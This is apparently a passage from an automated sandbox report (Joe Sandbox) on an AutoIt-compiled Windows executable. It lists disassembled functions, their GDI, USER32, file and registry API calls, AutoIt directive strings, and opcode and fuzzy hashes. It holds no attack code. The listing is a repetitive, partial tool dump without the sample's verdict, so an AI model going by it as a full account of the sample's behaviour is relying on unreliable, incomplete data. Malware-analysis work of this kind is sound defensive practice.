                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                        Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                        Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                        Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                        • API String ID: 4040870279-2373415609
                                                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                        Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 69173610-0
                                                                                                        • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                        • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                        Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                        • API String ID: 2910397461-517079104
                                                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                        Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsnicmp
                                                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                        • API String ID: 1038674560-3360698832
                                                                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                        Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 1675784387-0
                                                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                        Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                        • String ID:
                                                                                                        • API String ID: 1582027408-0
                                                                                                        • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                        • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                        Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
